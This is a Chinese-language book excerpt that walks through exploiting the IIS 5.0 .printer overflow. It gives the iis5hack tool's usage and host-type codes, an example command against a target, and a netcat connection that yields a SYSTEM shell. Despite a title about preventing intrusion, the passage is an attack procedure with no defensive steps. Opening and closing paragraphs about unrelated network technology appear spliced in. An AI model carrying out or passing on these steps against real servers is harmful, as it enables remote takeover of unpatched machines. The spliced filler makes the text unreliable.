黑客攻防技术内幕-防范入侵的办法(8)

网络技术是从1990年代中期发展起来的新技术，它把互联网上分散的资源融为有机整体，实现资源的全面共享和有机协作，使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享，网络则被认为是互联网发展的第三阶段。

6.5 Printer溢出漏洞入侵

    

6.5  Printer溢出漏洞入侵

关于printer漏洞原理，本书已在4.2.5小节 .printer漏洞修补中做了详细的介绍，由于.printer漏洞只有IIS5.0(Windows 2000 Server)存在，所以入侵者通过此漏洞入侵计算机只会针对IIS5.0进行，下面看看入侵者是如何利用.printer漏洞对服务器进行攻击的。

入侵者找到一台存在有.printer漏洞的IIS5.0服务器，下载一个在Windows平台上进行的.printer溢出程序—— iis5hack。

在命令提示符下运行iis5hack程序，如图6-55所示。

iis5hack使用说明如下。

<Host>：溢出的主机

<HostPort>：主机的端口

<HostType>：溢出主机的类型

<ShellPort>：溢出的端口

图6-55  IIS5hack程序运行界面

主机类型：

chinese edition: 0

chinese edition: sp1: 1      中文版IIS5.0

english edition: 2         

english edition: sp1: 3      英文版IIS5.0

japanese edition: 4

japanese edition, sp1: 5     日文版IIS5.0

korea edition: 6

korea edition, sp1: 7        朝文版IIS5.0

mexico edition: 8

mexico edition, sp1: 9      墨西哥版IIS5.0

命令行运行格式：

iis5hack 溢出主机地址 主机的端口 溢出主机的类型 溢出的端口

入侵测试：

(1) 找到一台存有.printer漏洞的IIS5.0服务器，这里目标机的IP地址为127.0.0.1。

(2) 打开命令提示符程序，在提示符下输入以下命令格式：

  iis5hack 127.0.0.1 80 1 3739

如图6-56所示。

图6-56  测试.printer溢出

提示：

iis5hack是指 .printer溢出程序，127.0.0.1为存有.printer溢出漏洞的主机，80是指主机的端口，1是指.printer溢出主机的类型为中文版，3739为溢出的端口。

 (3) 如果.printer溢出成功的话，会出现提示内容，如图6-57所示。

图6-57  .printer溢出成功

(4) .printer溢出成功后，iis5hack将提示：现在你可以远程登录到3739端口。

(5) 这时使用nc.exe程序登录到溢出的服务器上，如图6-58所示。

图6-58  登录到溢出的服务器

(6) 入侵测试成功，成功取得System的权限，如图6-59所示。

图6-59  入侵成功

提示：

此时入侵者完全控制了目标机，可以进行任何操作。

(7) 入侵测试完毕。

网络的神奇作用吸引着越来越多的用户加入其中，正因如此，网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......，各项技术都需要适时应势，对应发展，这正是网络迅速走向进步的催化剂。